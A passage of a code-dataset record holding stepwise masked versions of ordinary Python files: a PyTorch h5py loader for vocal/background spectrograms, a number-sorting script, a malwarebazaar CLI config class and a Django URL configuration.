mix = self.mix[index].astype(np.float32)
mix = torch.from_numpy(mix)
bg = torch.from_numpy(bg)
vocal = torch.from_numpy(vocal)
target = torch.from_numpy(create_gt_mask(vocal, bg))
sample = {'vocal': vocal, 'bg': bg, 'mix': mix, 'target': target}
return sample
def torch_dataset_loader(dataset, batch_size, shuffle, kwargs):
"""
take the h5py dataset
"""
loader = DataLoader(TorchData(dataset), batch_size=batch_size, shuffle=
shuffle, **kwargs)
return loader
train_loader = torch_dataset_loader(PARAS.TRAIN_DATA_PATH, PARAS.BATCH_SIZE,
True, PARAS.kwargs)
validation_loader = torch_dataset_loader(PARAS.VAL_DATA_PATH, PARAS.
BATCH_SIZE, False, PARAS.kwargs)
test_loader = torch_dataset_loader(PARAS.TEST_DATA_PATH, PARAS.BATCH_SIZE,
False, PARAS.kwargs)
if __name__ == '__main__':
for index, data_item in enumerate(test_loader):
print(data_item['vocal'].shape)
print(data_item['bg'].shape)
print(data_item['mix'].shape)
print(data_item['target'].shape)
break
<|reserved_special_token_1|>
import torch
import numpy as np
import h5py
from torch.utils.data import Dataset, DataLoader
from config import PARAS
<|reserved_special_token_0|>
def create_gt_mask(vocal_spec, bg_spec):
"""
Take in log spectrogram and return a mask map for TF bins
1 if the vocal sound is dominated in the TF-bin, while 0 for not
"""
vocal_spec = vocal_spec.numpy()
bg_spec = bg_spec.numpy()
return np.array(vocal_spec > bg_spec, dtype=np.float32)
class TorchData(Dataset):
def __init__(self, dataset_path):
"""
Take the h5py dataset
"""
super(TorchData, self).__init__()
self.dataset = h5py.File(dataset_path, 'r')
self.bg = self.dataset['bg']
self.vocal = self.dataset['vocal']
self.mix = self.dataset['mix']
self.len = self.bg.shape[0]
def __len__(self):
return self.len
def __getitem__(self, index):
bg = self.bg[index].astype(np.float32)
vocal = self.vocal[index].astype(np.float32)
mix = self.mix[index].astype(np.float32)
mix = torch.from_numpy(mix)
bg = torch.from_numpy(bg)
vocal = torch.from_numpy(vocal)
target = torch.from_numpy(create_gt_mask(vocal, bg))
sample = {'vocal': vocal, 'bg': bg, 'mix': mix, 'target': target}
return sample
def torch_dataset_loader(dataset, batch_size, shuffle, kwargs):
"""
take the h5py dataset
"""
loader = DataLoader(TorchData(dataset), batch_size=batch_size, shuffle=
shuffle, **kwargs)
return loader
train_loader = torch_dataset_loader(PARAS.TRAIN_DATA_PATH, PARAS.BATCH_SIZE,
True, PARAS.kwargs)
validation_loader = torch_dataset_loader(PARAS.VAL_DATA_PATH, PARAS.
BATCH_SIZE, False, PARAS.kwargs)
test_loader = torch_dataset_loader(PARAS.TEST_DATA_PATH, PARAS.BATCH_SIZE,
False, PARAS.kwargs)
if __name__ == '__main__':
for index, data_item in enumerate(test_loader):
print(data_item['vocal'].shape)
print(data_item['bg'].shape)
print(data_item['mix'].shape)
print(data_item['target'].shape)
break
<|reserved_special_token_1|>
import torch
import numpy as np
import h5py
from torch.utils.data import Dataset, DataLoader
from config import PARAS
"""
Be careful:
We use log mel-spectrogram for training,
while the mask generated is for power mel-spectrogram
"""
def create_gt_mask(vocal_spec, bg_spec):
"""
Take in log spectrogram and return a mask map for TF bins
1 if the vocal sound is dominated in the TF-bin, while 0 for not
"""
vocal_spec = vocal_spec.numpy()
bg_spec = bg_spec.numpy()
return np.array(vocal_spec > bg_spec, dtype=np.float32)
class TorchData(Dataset):
def __init__(self, dataset_path):
"""
Take the h5py dataset
"""
super(TorchData, self).__init__()
self.dataset = h5py.File(dataset_path, 'r')
self.bg = self.dataset['bg']
self.vocal = self.dataset['vocal']
self.mix = self.dataset['mix']
self.len = self.bg.shape[0]
def __len__(self):
return self.len
def __getitem__(self, index):
bg = self.bg[index].astype(np.float32)
vocal = self.vocal[index].astype(np.float32)
mix = self.mix[index].astype(np.float32)
mix = torch.from_numpy(mix)
bg = torch.from_numpy(bg)
vocal = torch.from_numpy(vocal)
target = torch.from_numpy(create_gt_mask(vocal, bg))
sample = {
'vocal': vocal, # this is used for test
'bg': bg, # this is used for test
'mix': mix,
'target': target,
}
return sample
# define the data loaders
def torch_dataset_loader(dataset, batch_size, shuffle, kwargs):
"""
take the h5py dataset
"""
loader = DataLoader(TorchData(dataset),
batch_size=batch_size,
shuffle=shuffle,
**kwargs)
return loader
train_loader = torch_dataset_loader(PARAS.TRAIN_DATA_PATH, PARAS.BATCH_SIZE, True, PARAS.kwargs)
validation_loader = torch_dataset_loader(PARAS.VAL_DATA_PATH, PARAS.BATCH_SIZE, False, PARAS.kwargs)
test_loader = torch_dataset_loader(PARAS.TEST_DATA_PATH, PARAS.BATCH_SIZE, False, PARAS.kwargs)
if __name__ == '__main__':
for index, data_item in enumerate(test_loader):
print(data_item['vocal'].shape)
print(data_item['bg'].shape)
print(data_item['mix'].shape)
print(data_item['target'].shape)
break
|
flexible
|
{
"blob_id": "1133d3cf900e31278dc491565c99969a116e6c83",
"index": 1998,
"step-1": "<mask token>\n\n\nclass TorchData(Dataset):\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef create_gt_mask(vocal_spec, bg_spec):\n \"\"\"\n Take in log spectrogram and return a mask map for TF bins\n 1 if the vocal sound is dominated in the TF-bin, while 0 for not\n \"\"\"\n vocal_spec = vocal_spec.numpy()\n bg_spec = bg_spec.numpy()\n return np.array(vocal_spec > bg_spec, dtype=np.float32)\n\n\nclass TorchData(Dataset):\n\n def __init__(self, dataset_path):\n \"\"\"\n Take the h5py dataset\n \"\"\"\n super(TorchData, self).__init__()\n self.dataset = h5py.File(dataset_path, 'r')\n self.bg = self.dataset['bg']\n self.vocal = self.dataset['vocal']\n self.mix = self.dataset['mix']\n self.len = self.bg.shape[0]\n\n def __len__(self):\n return self.len\n\n def __getitem__(self, index):\n bg = self.bg[index].astype(np.float32)\n vocal = self.vocal[index].astype(np.float32)\n mix = self.mix[index].astype(np.float32)\n mix = torch.from_numpy(mix)\n bg = torch.from_numpy(bg)\n vocal = torch.from_numpy(vocal)\n target = torch.from_numpy(create_gt_mask(vocal, bg))\n sample = {'vocal': vocal, 'bg': bg, 'mix': mix, 'target': target}\n return sample\n\n\ndef torch_dataset_loader(dataset, batch_size, shuffle, kwargs):\n \"\"\"\n take the h5py dataset\n \"\"\"\n loader = DataLoader(TorchData(dataset), batch_size=batch_size, shuffle=\n shuffle, **kwargs)\n return loader\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef create_gt_mask(vocal_spec, bg_spec):\n \"\"\"\n Take in log spectrogram and return a mask map for TF bins\n 1 if the vocal sound is dominated in the TF-bin, while 0 for not\n \"\"\"\n vocal_spec = vocal_spec.numpy()\n bg_spec = bg_spec.numpy()\n return np.array(vocal_spec > bg_spec, dtype=np.float32)\n\n\nclass TorchData(Dataset):\n\n def __init__(self, dataset_path):\n \"\"\"\n Take the h5py dataset\n \"\"\"\n super(TorchData, self).__init__()\n self.dataset = h5py.File(dataset_path, 'r')\n self.bg = self.dataset['bg']\n self.vocal = self.dataset['vocal']\n self.mix = self.dataset['mix']\n self.len = self.bg.shape[0]\n\n def __len__(self):\n return self.len\n\n def __getitem__(self, index):\n bg = self.bg[index].astype(np.float32)\n vocal = self.vocal[index].astype(np.float32)\n mix = self.mix[index].astype(np.float32)\n mix = torch.from_numpy(mix)\n bg = torch.from_numpy(bg)\n vocal = torch.from_numpy(vocal)\n target = torch.from_numpy(create_gt_mask(vocal, bg))\n sample = {'vocal': vocal, 'bg': bg, 'mix': mix, 'target': target}\n return sample\n\n\ndef torch_dataset_loader(dataset, batch_size, shuffle, kwargs):\n \"\"\"\n take the h5py dataset\n \"\"\"\n loader = DataLoader(TorchData(dataset), batch_size=batch_size, shuffle=\n shuffle, **kwargs)\n return loader\n\n\ntrain_loader = torch_dataset_loader(PARAS.TRAIN_DATA_PATH, PARAS.BATCH_SIZE,\n True, PARAS.kwargs)\nvalidation_loader = torch_dataset_loader(PARAS.VAL_DATA_PATH, PARAS.\n BATCH_SIZE, False, PARAS.kwargs)\ntest_loader = torch_dataset_loader(PARAS.TEST_DATA_PATH, PARAS.BATCH_SIZE, \n False, PARAS.kwargs)\nif __name__ == '__main__':\n for index, data_item in enumerate(test_loader):\n print(data_item['vocal'].shape)\n print(data_item['bg'].shape)\n print(data_item['mix'].shape)\n print(data_item['target'].shape)\n break\n",
"step-4": "import torch\nimport numpy as np\nimport h5py\nfrom torch.utils.data import Dataset, DataLoader\nfrom config import PARAS\n<mask token>\n\n\ndef create_gt_mask(vocal_spec, bg_spec):\n \"\"\"\n Take in log spectrogram and return a mask map for TF bins\n 1 if the vocal sound is dominated in the TF-bin, while 0 for not\n \"\"\"\n vocal_spec = vocal_spec.numpy()\n bg_spec = bg_spec.numpy()\n return np.array(vocal_spec > bg_spec, dtype=np.float32)\n\n\nclass TorchData(Dataset):\n\n def __init__(self, dataset_path):\n \"\"\"\n Take the h5py dataset\n \"\"\"\n super(TorchData, self).__init__()\n self.dataset = h5py.File(dataset_path, 'r')\n self.bg = self.dataset['bg']\n self.vocal = self.dataset['vocal']\n self.mix = self.dataset['mix']\n self.len = self.bg.shape[0]\n\n def __len__(self):\n return self.len\n\n def __getitem__(self, index):\n bg = self.bg[index].astype(np.float32)\n vocal = self.vocal[index].astype(np.float32)\n mix = self.mix[index].astype(np.float32)\n mix = torch.from_numpy(mix)\n bg = torch.from_numpy(bg)\n vocal = torch.from_numpy(vocal)\n target = torch.from_numpy(create_gt_mask(vocal, bg))\n sample = {'vocal': vocal, 'bg': bg, 'mix': mix, 'target': target}\n return sample\n\n\ndef torch_dataset_loader(dataset, batch_size, shuffle, kwargs):\n \"\"\"\n take the h5py dataset\n \"\"\"\n loader = DataLoader(TorchData(dataset), batch_size=batch_size, shuffle=\n shuffle, **kwargs)\n return loader\n\n\ntrain_loader = torch_dataset_loader(PARAS.TRAIN_DATA_PATH, PARAS.BATCH_SIZE,\n True, PARAS.kwargs)\nvalidation_loader = torch_dataset_loader(PARAS.VAL_DATA_PATH, PARAS.\n BATCH_SIZE, False, PARAS.kwargs)\ntest_loader = torch_dataset_loader(PARAS.TEST_DATA_PATH, PARAS.BATCH_SIZE, \n False, PARAS.kwargs)\nif __name__ == '__main__':\n for index, data_item in enumerate(test_loader):\n print(data_item['vocal'].shape)\n print(data_item['bg'].shape)\n print(data_item['mix'].shape)\n print(data_item['target'].shape)\n break\n",
"step-5": "import torch\nimport numpy as np\nimport h5py\nfrom torch.utils.data import Dataset, DataLoader\nfrom config import PARAS\n\n\"\"\"\nBe careful:\nWe use log mel-spectrogram for training,\nwhile the mask generated is for power mel-spectrogram\n\"\"\"\n\n\ndef create_gt_mask(vocal_spec, bg_spec):\n \"\"\"\n Take in log spectrogram and return a mask map for TF bins\n 1 if the vocal sound is dominated in the TF-bin, while 0 for not\n \"\"\"\n vocal_spec = vocal_spec.numpy()\n bg_spec = bg_spec.numpy()\n return np.array(vocal_spec > bg_spec, dtype=np.float32)\n\n\nclass TorchData(Dataset):\n\n def __init__(self, dataset_path):\n \"\"\"\n Take the h5py dataset\n \"\"\"\n super(TorchData, self).__init__()\n self.dataset = h5py.File(dataset_path, 'r')\n self.bg = self.dataset['bg']\n self.vocal = self.dataset['vocal']\n self.mix = self.dataset['mix']\n self.len = self.bg.shape[0]\n\n def __len__(self):\n return self.len\n\n def __getitem__(self, index):\n bg = self.bg[index].astype(np.float32)\n vocal = self.vocal[index].astype(np.float32)\n mix = self.mix[index].astype(np.float32)\n\n mix = torch.from_numpy(mix)\n bg = torch.from_numpy(bg)\n vocal = torch.from_numpy(vocal)\n target = torch.from_numpy(create_gt_mask(vocal, bg))\n\n sample = {\n 'vocal': vocal, # this is used for test\n 'bg': bg, # this is used for test\n 'mix': mix,\n 'target': target,\n }\n\n return sample\n\n\n# define the data loaders\ndef torch_dataset_loader(dataset, batch_size, shuffle, kwargs):\n \"\"\"\n take the h5py dataset\n \"\"\"\n loader = DataLoader(TorchData(dataset),\n batch_size=batch_size,\n shuffle=shuffle,\n **kwargs)\n return loader\n\n\ntrain_loader = torch_dataset_loader(PARAS.TRAIN_DATA_PATH, PARAS.BATCH_SIZE, True, PARAS.kwargs)\nvalidation_loader = torch_dataset_loader(PARAS.VAL_DATA_PATH, PARAS.BATCH_SIZE, False, PARAS.kwargs)\ntest_loader = torch_dataset_loader(PARAS.TEST_DATA_PATH, PARAS.BATCH_SIZE, False, PARAS.kwargs)\n\n\nif __name__ == '__main__':\n\n for index, 
data_item in enumerate(test_loader):\n print(data_item['vocal'].shape)\n print(data_item['bg'].shape)\n print(data_item['mix'].shape)\n print(data_item['target'].shape)\n break\n",
"step-ids": [
1,
6,
8,
9,
10
]
}
|
[
1,
6,
8,
9,
10
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main():
num_seq = input('Введите последовательность чисел через пробел: ').split()
num_lst = [float(s) for s in num_seq if is_numb_val(s)]
print(sorted(num_lst))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def is_numb_val(val):
try:
x = float(val)
except ValueError:
return False
else:
return True
def main():
num_seq = input('Введите последовательность чисел через пробел: ').split()
num_lst = [float(s) for s in num_seq if is_numb_val(s)]
print(sorted(num_lst))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def is_numb_val(val):
try:
x = float(val)
except ValueError:
return False
else:
return True
def main():
num_seq = input('Введите последовательность чисел через пробел: ').split()
num_lst = [float(s) for s in num_seq if is_numb_val(s)]
print(sorted(num_lst))
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
# Напишите программу, которая вводит с клавиатуры последовательность чисел и выводит её
# отсортированной в порядке возрастания.
def is_numb_val(val):
try:
x = float(val)
except ValueError:
return False
else:
return True
def main():
num_seq = input("Введите последовательность чисел через пробел: ").split()
num_lst = [float(s) for s in num_seq if is_numb_val(s)]
print(sorted(num_lst))
if __name__ == '__main__':
main()
|
flexible
|
{
"blob_id": "4c8a873c816678532b029af409be13258757eae1",
"index": 7577,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n num_seq = input('Введите последовательность чисел через пробел: ').split()\n num_lst = [float(s) for s in num_seq if is_numb_val(s)]\n print(sorted(num_lst))\n\n\n<mask token>\n",
"step-3": "def is_numb_val(val):\n try:\n x = float(val)\n except ValueError:\n return False\n else:\n return True\n\n\ndef main():\n num_seq = input('Введите последовательность чисел через пробел: ').split()\n num_lst = [float(s) for s in num_seq if is_numb_val(s)]\n print(sorted(num_lst))\n\n\n<mask token>\n",
"step-4": "def is_numb_val(val):\n try:\n x = float(val)\n except ValueError:\n return False\n else:\n return True\n\n\ndef main():\n num_seq = input('Введите последовательность чисел через пробел: ').split()\n num_lst = [float(s) for s in num_seq if is_numb_val(s)]\n print(sorted(num_lst))\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "# Напишите программу, которая вводит с клавиатуры последовательность чисел и выводит её\n# отсортированной в порядке возрастания.\n\n\ndef is_numb_val(val):\n try:\n x = float(val)\n except ValueError:\n return False\n else:\n return True\n\ndef main():\n num_seq = input(\"Введите последовательность чисел через пробел: \").split()\n num_lst = [float(s) for s in num_seq if is_numb_val(s)]\n print(sorted(num_lst))\n\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class Config(OrderedDict):
<|reserved_special_token_0|>
def __init__(self):
ec = Console(stderr=True, style='bold red')
Config.ensure_path(ec)
config_file = get_config_path()
if not os.path.exists(config_file) or os.path.getsize(config_file
) == 0:
ec.print('Config does not exist, please run the init command.')
exit(-1)
with io.open(config_file, 'r') as handle:
config_data = yaml.load(handle.read(), Loader=yaml.Loader)
super().__init__(**config_data)
@staticmethod
def get_instance():
if not Config.instance:
return Config()
return Config.instance
@staticmethod
def ensure_path(ec: Console=Console(stderr=True, style='bold red')):
config_dir = get_config_dir()
if not os.path.exists(config_dir):
os.mkdir(config_dir)
if not os.path.isdir(config_dir):
ec.print(f'{config_dir} should be a dir, but is a file.')
exit(-1)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Config(OrderedDict):
<|reserved_special_token_0|>
def __init__(self):
ec = Console(stderr=True, style='bold red')
Config.ensure_path(ec)
config_file = get_config_path()
if not os.path.exists(config_file) or os.path.getsize(config_file
) == 0:
ec.print('Config does not exist, please run the init command.')
exit(-1)
with io.open(config_file, 'r') as handle:
config_data = yaml.load(handle.read(), Loader=yaml.Loader)
super().__init__(**config_data)
@staticmethod
def get_instance():
if not Config.instance:
return Config()
return Config.instance
@staticmethod
def ensure_path(ec: Console=Console(stderr=True, style='bold red')):
config_dir = get_config_dir()
if not os.path.exists(config_dir):
os.mkdir(config_dir)
if not os.path.isdir(config_dir):
ec.print(f'{config_dir} should be a dir, but is a file.')
exit(-1)
@staticmethod
def init_config(key: str):
Config.ensure_path()
with io.open(get_config_path(), 'w') as handle:
bytes = handle.write(yaml.dump({'api_key': key, 'csv_columns':
{'md5': 'md5_hash', 'sha1': 'sha1_hash', 'sha256':
'sha256_hash', 'imphash': 'imphash', 'signature':
'signature', 'tags': 'tags'}}, Dumper=yaml.Dumper))
if bytes <= 0:
raise IOError(f'Writing to config file failed.')
return True
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Config(OrderedDict):
instance = None
def __init__(self):
ec = Console(stderr=True, style='bold red')
Config.ensure_path(ec)
config_file = get_config_path()
if not os.path.exists(config_file) or os.path.getsize(config_file
) == 0:
ec.print('Config does not exist, please run the init command.')
exit(-1)
with io.open(config_file, 'r') as handle:
config_data = yaml.load(handle.read(), Loader=yaml.Loader)
super().__init__(**config_data)
@staticmethod
def get_instance():
if not Config.instance:
return Config()
return Config.instance
@staticmethod
def ensure_path(ec: Console=Console(stderr=True, style='bold red')):
config_dir = get_config_dir()
if not os.path.exists(config_dir):
os.mkdir(config_dir)
if not os.path.isdir(config_dir):
ec.print(f'{config_dir} should be a dir, but is a file.')
exit(-1)
@staticmethod
def init_config(key: str):
Config.ensure_path()
with io.open(get_config_path(), 'w') as handle:
bytes = handle.write(yaml.dump({'api_key': key, 'csv_columns':
{'md5': 'md5_hash', 'sha1': 'sha1_hash', 'sha256':
'sha256_hash', 'imphash': 'imphash', 'signature':
'signature', 'tags': 'tags'}}, Dumper=yaml.Dumper))
if bytes <= 0:
raise IOError(f'Writing to config file failed.')
return True
<|reserved_special_token_1|>
import os
import io
import yaml
from collections import OrderedDict
from rich.console import Console
from malwarebazaar.platform import get_config_path, get_config_dir
class Config(OrderedDict):
instance = None
def __init__(self):
ec = Console(stderr=True, style='bold red')
Config.ensure_path(ec)
config_file = get_config_path()
if not os.path.exists(config_file) or os.path.getsize(config_file
) == 0:
ec.print('Config does not exist, please run the init command.')
exit(-1)
with io.open(config_file, 'r') as handle:
config_data = yaml.load(handle.read(), Loader=yaml.Loader)
super().__init__(**config_data)
@staticmethod
def get_instance():
if not Config.instance:
return Config()
return Config.instance
@staticmethod
def ensure_path(ec: Console=Console(stderr=True, style='bold red')):
config_dir = get_config_dir()
if not os.path.exists(config_dir):
os.mkdir(config_dir)
if not os.path.isdir(config_dir):
ec.print(f'{config_dir} should be a dir, but is a file.')
exit(-1)
@staticmethod
def init_config(key: str):
Config.ensure_path()
with io.open(get_config_path(), 'w') as handle:
bytes = handle.write(yaml.dump({'api_key': key, 'csv_columns':
{'md5': 'md5_hash', 'sha1': 'sha1_hash', 'sha256':
'sha256_hash', 'imphash': 'imphash', 'signature':
'signature', 'tags': 'tags'}}, Dumper=yaml.Dumper))
if bytes <= 0:
raise IOError(f'Writing to config file failed.')
return True
<|reserved_special_token_1|>
import os
import io
import yaml
from collections import OrderedDict
from rich.console import Console
from malwarebazaar.platform import get_config_path, get_config_dir
class Config(OrderedDict):
instance = None
def __init__(self):
ec = Console(stderr=True, style="bold red")
Config.ensure_path(ec)
config_file = get_config_path()
if not os.path.exists(config_file) or os.path.getsize(config_file) == 0:
ec.print("Config does not exist, please run the init command.")
exit(-1)
with io.open(config_file, "r") as handle:
config_data = yaml.load(handle.read(), Loader=yaml.Loader)
super().__init__(**config_data)
@staticmethod
def get_instance():
if not Config.instance:
return Config()
return Config.instance
@staticmethod
def ensure_path(ec: Console = Console(stderr=True, style="bold red")):
config_dir = get_config_dir()
if not os.path.exists(config_dir):
os.mkdir(config_dir)
if not os.path.isdir(config_dir):
ec.print(f"{config_dir} should be a dir, but is a file.")
exit(-1)
@staticmethod
def init_config(key: str):
Config.ensure_path()
with io.open(get_config_path(), "w") as handle:
bytes = handle.write(yaml.dump(
{
"api_key": key,
"csv_columns": {
"md5": "md5_hash",
"sha1": "sha1_hash",
"sha256": "sha256_hash",
"imphash": "imphash",
"signature": "signature",
"tags": "tags"
}
},
Dumper=yaml.Dumper
))
if bytes <= 0:
raise IOError(f"Writing to config file failed.")
return True
|
flexible
|
{
"blob_id": "5a9e0b220d2c94aea7e3d67338771cf48c3aec8f",
"index": 6439,
"step-1": "<mask token>\n\n\nclass Config(OrderedDict):\n <mask token>\n\n def __init__(self):\n ec = Console(stderr=True, style='bold red')\n Config.ensure_path(ec)\n config_file = get_config_path()\n if not os.path.exists(config_file) or os.path.getsize(config_file\n ) == 0:\n ec.print('Config does not exist, please run the init command.')\n exit(-1)\n with io.open(config_file, 'r') as handle:\n config_data = yaml.load(handle.read(), Loader=yaml.Loader)\n super().__init__(**config_data)\n\n @staticmethod\n def get_instance():\n if not Config.instance:\n return Config()\n return Config.instance\n\n @staticmethod\n def ensure_path(ec: Console=Console(stderr=True, style='bold red')):\n config_dir = get_config_dir()\n if not os.path.exists(config_dir):\n os.mkdir(config_dir)\n if not os.path.isdir(config_dir):\n ec.print(f'{config_dir} should be a dir, but is a file.')\n exit(-1)\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Config(OrderedDict):\n <mask token>\n\n def __init__(self):\n ec = Console(stderr=True, style='bold red')\n Config.ensure_path(ec)\n config_file = get_config_path()\n if not os.path.exists(config_file) or os.path.getsize(config_file\n ) == 0:\n ec.print('Config does not exist, please run the init command.')\n exit(-1)\n with io.open(config_file, 'r') as handle:\n config_data = yaml.load(handle.read(), Loader=yaml.Loader)\n super().__init__(**config_data)\n\n @staticmethod\n def get_instance():\n if not Config.instance:\n return Config()\n return Config.instance\n\n @staticmethod\n def ensure_path(ec: Console=Console(stderr=True, style='bold red')):\n config_dir = get_config_dir()\n if not os.path.exists(config_dir):\n os.mkdir(config_dir)\n if not os.path.isdir(config_dir):\n ec.print(f'{config_dir} should be a dir, but is a file.')\n exit(-1)\n\n @staticmethod\n def init_config(key: str):\n Config.ensure_path()\n with io.open(get_config_path(), 'w') as handle:\n bytes = handle.write(yaml.dump({'api_key': key, 'csv_columns':\n {'md5': 'md5_hash', 'sha1': 'sha1_hash', 'sha256':\n 'sha256_hash', 'imphash': 'imphash', 'signature':\n 'signature', 'tags': 'tags'}}, Dumper=yaml.Dumper))\n if bytes <= 0:\n raise IOError(f'Writing to config file failed.')\n return True\n",
"step-3": "<mask token>\n\n\nclass Config(OrderedDict):\n instance = None\n\n def __init__(self):\n ec = Console(stderr=True, style='bold red')\n Config.ensure_path(ec)\n config_file = get_config_path()\n if not os.path.exists(config_file) or os.path.getsize(config_file\n ) == 0:\n ec.print('Config does not exist, please run the init command.')\n exit(-1)\n with io.open(config_file, 'r') as handle:\n config_data = yaml.load(handle.read(), Loader=yaml.Loader)\n super().__init__(**config_data)\n\n @staticmethod\n def get_instance():\n if not Config.instance:\n return Config()\n return Config.instance\n\n @staticmethod\n def ensure_path(ec: Console=Console(stderr=True, style='bold red')):\n config_dir = get_config_dir()\n if not os.path.exists(config_dir):\n os.mkdir(config_dir)\n if not os.path.isdir(config_dir):\n ec.print(f'{config_dir} should be a dir, but is a file.')\n exit(-1)\n\n @staticmethod\n def init_config(key: str):\n Config.ensure_path()\n with io.open(get_config_path(), 'w') as handle:\n bytes = handle.write(yaml.dump({'api_key': key, 'csv_columns':\n {'md5': 'md5_hash', 'sha1': 'sha1_hash', 'sha256':\n 'sha256_hash', 'imphash': 'imphash', 'signature':\n 'signature', 'tags': 'tags'}}, Dumper=yaml.Dumper))\n if bytes <= 0:\n raise IOError(f'Writing to config file failed.')\n return True\n",
"step-4": "import os\nimport io\nimport yaml\nfrom collections import OrderedDict\nfrom rich.console import Console\nfrom malwarebazaar.platform import get_config_path, get_config_dir\n\n\nclass Config(OrderedDict):\n instance = None\n\n def __init__(self):\n ec = Console(stderr=True, style='bold red')\n Config.ensure_path(ec)\n config_file = get_config_path()\n if not os.path.exists(config_file) or os.path.getsize(config_file\n ) == 0:\n ec.print('Config does not exist, please run the init command.')\n exit(-1)\n with io.open(config_file, 'r') as handle:\n config_data = yaml.load(handle.read(), Loader=yaml.Loader)\n super().__init__(**config_data)\n\n @staticmethod\n def get_instance():\n if not Config.instance:\n return Config()\n return Config.instance\n\n @staticmethod\n def ensure_path(ec: Console=Console(stderr=True, style='bold red')):\n config_dir = get_config_dir()\n if not os.path.exists(config_dir):\n os.mkdir(config_dir)\n if not os.path.isdir(config_dir):\n ec.print(f'{config_dir} should be a dir, but is a file.')\n exit(-1)\n\n @staticmethod\n def init_config(key: str):\n Config.ensure_path()\n with io.open(get_config_path(), 'w') as handle:\n bytes = handle.write(yaml.dump({'api_key': key, 'csv_columns':\n {'md5': 'md5_hash', 'sha1': 'sha1_hash', 'sha256':\n 'sha256_hash', 'imphash': 'imphash', 'signature':\n 'signature', 'tags': 'tags'}}, Dumper=yaml.Dumper))\n if bytes <= 0:\n raise IOError(f'Writing to config file failed.')\n return True\n",
"step-5": "import os\nimport io\nimport yaml\nfrom collections import OrderedDict\n\nfrom rich.console import Console\n\nfrom malwarebazaar.platform import get_config_path, get_config_dir\n\n\nclass Config(OrderedDict):\n instance = None\n\n def __init__(self):\n ec = Console(stderr=True, style=\"bold red\")\n Config.ensure_path(ec)\n config_file = get_config_path()\n if not os.path.exists(config_file) or os.path.getsize(config_file) == 0:\n ec.print(\"Config does not exist, please run the init command.\")\n exit(-1)\n\n with io.open(config_file, \"r\") as handle:\n config_data = yaml.load(handle.read(), Loader=yaml.Loader)\n\n super().__init__(**config_data)\n\n @staticmethod\n def get_instance():\n if not Config.instance:\n return Config()\n return Config.instance\n\n @staticmethod\n def ensure_path(ec: Console = Console(stderr=True, style=\"bold red\")):\n config_dir = get_config_dir()\n\n if not os.path.exists(config_dir):\n os.mkdir(config_dir)\n\n if not os.path.isdir(config_dir):\n ec.print(f\"{config_dir} should be a dir, but is a file.\")\n exit(-1)\n\n @staticmethod\n def init_config(key: str):\n Config.ensure_path()\n with io.open(get_config_path(), \"w\") as handle:\n bytes = handle.write(yaml.dump(\n {\n \"api_key\": key,\n \"csv_columns\": {\n \"md5\": \"md5_hash\",\n \"sha1\": \"sha1_hash\",\n \"sha256\": \"sha256_hash\",\n \"imphash\": \"imphash\",\n \"signature\": \"signature\",\n \"tags\": \"tags\"\n }\n },\n Dumper=yaml.Dumper\n ))\n\n if bytes <= 0:\n raise IOError(f\"Writing to config file failed.\")\n return True\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
urlpatterns += static(settings_common.MEDIA_URL, document_root=settings_dev
.MEDIA_ROOT)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
urlpatterns = [path('admin/', admin.site.urls), path('', include(
'login_test_app.urls')), path('accounts/', include('allauth.urls')),
path('__debug__/', include(debug_toolbar.urls))]
urlpatterns += static(settings_common.MEDIA_URL, document_root=settings_dev
.MEDIA_ROOT)
<|reserved_special_token_1|>
from django.contrib import admin
from django.contrib.staticfiles.urls import static
from django.urls import path, include
from . import settings_common, settings_dev
import debug_toolbar
urlpatterns = [path('admin/', admin.site.urls), path('', include(
'login_test_app.urls')), path('accounts/', include('allauth.urls')),
path('__debug__/', include(debug_toolbar.urls))]
urlpatterns += static(settings_common.MEDIA_URL, document_root=settings_dev
.MEDIA_ROOT)
<|reserved_special_token_1|>
from django.contrib import admin
from django.contrib.staticfiles.urls import static # 本Ch11.1
from django.urls import path, include
from . import settings_common, settings_dev # 本Ch11.1
import debug_toolbar
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('login_test_app.urls')),
path('accounts/', include('allauth.urls')), # allauthデフォルトURL:本P218
path('__debug__/', include(debug_toolbar.urls)),
]
# 開発サーバーでMEDIA_ROOT,MEDIA_URLを渡したdjango.contrib.staticfiles.urls.static関数から
# 返されたルーティングを追加する
urlpatterns +=static(settings_common.MEDIA_URL, document_root=settings_dev.MEDIA_ROOT)
|
flexible
|
{
"blob_id": "ce626afa7c0fd2e190afd92b57a0ebebf19f9e9b",
"index": 6842,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns += static(settings_common.MEDIA_URL, document_root=settings_dev\n .MEDIA_ROOT)\n",
"step-3": "<mask token>\nurlpatterns = [path('admin/', admin.site.urls), path('', include(\n 'login_test_app.urls')), path('accounts/', include('allauth.urls')),\n path('__debug__/', include(debug_toolbar.urls))]\nurlpatterns += static(settings_common.MEDIA_URL, document_root=settings_dev\n .MEDIA_ROOT)\n",
"step-4": "from django.contrib import admin\nfrom django.contrib.staticfiles.urls import static\nfrom django.urls import path, include\nfrom . import settings_common, settings_dev\nimport debug_toolbar\nurlpatterns = [path('admin/', admin.site.urls), path('', include(\n 'login_test_app.urls')), path('accounts/', include('allauth.urls')),\n path('__debug__/', include(debug_toolbar.urls))]\nurlpatterns += static(settings_common.MEDIA_URL, document_root=settings_dev\n .MEDIA_ROOT)\n",
